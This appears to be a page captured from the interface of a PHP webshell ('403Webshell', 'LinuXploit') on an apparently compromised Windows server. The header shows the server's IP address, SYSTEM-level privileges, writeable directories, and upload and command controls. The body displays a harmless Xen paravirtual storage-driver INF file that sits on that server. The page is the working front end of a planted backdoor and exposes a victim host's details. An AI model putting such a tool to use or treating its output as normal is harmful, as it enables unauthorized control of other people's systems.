403Webshell
Server IP : 123.56.80.60  /  Your IP : 216.73.216.78
Web Server : Apache/2.4.54 (Win32) OpenSSL/1.1.1s PHP/7.4.33 mod_fcgid/2.3.10-dev
System : Windows NT iZhx3sob14hnz7Z 10.0 build 14393 (Windows Server 2016) i586
User : SYSTEM ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/ProgramData/aliyun/vminit/xen/Wlh/amd64/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : C:/ProgramData/aliyun/vminit/xen/Wlh/amd64/xenvbd.inf
[Version]
Signature="$WINDOWS NT$"
Class=SCSIAdapter
ClassGuid={4D36E97B-E325-11CE-BFC1-08002BE10318}
Provider=%XenPvDriver%
CatalogFile="xenvbd.cat"
DriverVer=12/10/2018,0.1.0.20

[DestinationDirs]
DefaultDestDir = 12

[ControlFlags]
ExcludeFromSelect=*

[Manufacturer]
%XenPvDriver%=XenPvDriver,NTAMD64

[XenPvDriver.NTAMD64]
%XenVbd.DRVDESC%=XenVbd_Inst, XEN\VBD

[XenPvDriver]
%XenVbd.DRVDESC%=XenVbd_Inst, XEN\VBD

[XenVbd_Inst.NT]
CopyFiles=XenVbd.CopyFiles

[XenVbd.CopyFiles]
xenvbd.sys,,0x00001000 ; COPYFLG_REPLACE_BOOT_FILE

[XenVbd_Inst.NT.Services]
AddService=XenVbd,2,XenVbd_Service, XenVbd_EventLog

[XenVbd_Service]
DisplayName    = %XenVbd.SVCDESC%                            
ServiceType    = 1
StartType      = 0
ErrorControl   = 1
LoadOrderGroup = System Bus Extender
ServiceBinary  = %12%\xenvbd.sys                            
AddReg = XenVbd_Service_AddReg

[XenVbd_Service_AddReg]
HKR,"Parameters\PnpInterface", "15", 0x00010001, 0x00000001
; hide Qemu IDE in XenPCI
HKLM,"SYSTEM\CurrentControlSet\Services\XenPCI\Parameters", "hide_devices", 0x00010008, "#vbd#"
HKLM,"SYSTEM\CurrentControlSet\Services\XenPCI\Parameters", "hide_devices", 0x00010008, "VEN_8086&DEV_7010"
HKLM,"SYSTEM\CurrentControlSet\Services\XenPCI\Parameters", "hide_devices", 0x00010008, "primary_ide_channel"
HKLM,"SYSTEM\CurrentControlSet\Services\XenPCI\Parameters", "hide_devices", 0x00010008, "secondary_ide_channel"
HKLM,"SYSTEM\CurrentControlSet\Services\XenPCI\Parameters", "hide_devices", 0x00010008, "*pnp0600"
; tell Qemu to hide stuff
HKLM,"SYSTEM\CurrentControlSet\Services\XenPCI\Parameters", "qemu_hide_flags", 0x00010008, %QEMU_UNPLUG_ALL_IDE_DISKS%

[XenVbd_EventLog]
AddReg = XenVbd_EventLog_AddReg

[XenVbd_EventLog_AddReg]
HKR,,EventMessageFile,0x00020000,"%SystemRoot%\System32\IoLogMsg.dll;%SystemRoot%\System32\drivers\XenVbd.sys"
HKR,,TypesSupported,0x00010001,7

[SourceDisksFiles]
xenvbd.sys=1

[SourceDisksNames]
1 = %DISK_NAME%

[Strings]
XenPvDriver = "PV Driver Developers"
XenVbd.SVCDESC = "Block Device PV Driver"
XenVbd.DRVDESC = "Block Device PV Driver"
DISK_NAME = "Block Device PV Driver Install Disk"
FLG_ADDREG_TYPE_DWORD = 0x00010001
QEMU_UNPLUG_ALL_IDE_DISKS = 1
QEMU_UNPLUG_ALL_NICS      = 2
QEMU_UNPLUG_AUX_IDE_DISKS = 4

Youez - 2016 - github.com/yon3zu
LinuXploit